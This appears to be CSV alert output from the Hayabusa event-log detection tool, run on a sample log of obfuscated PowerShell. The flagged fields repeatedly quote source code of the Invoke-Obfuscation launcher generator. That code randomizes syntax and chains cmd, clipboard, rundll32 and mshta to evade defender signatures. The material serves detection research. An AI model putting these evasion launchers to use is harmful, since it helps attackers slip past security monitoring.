PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = 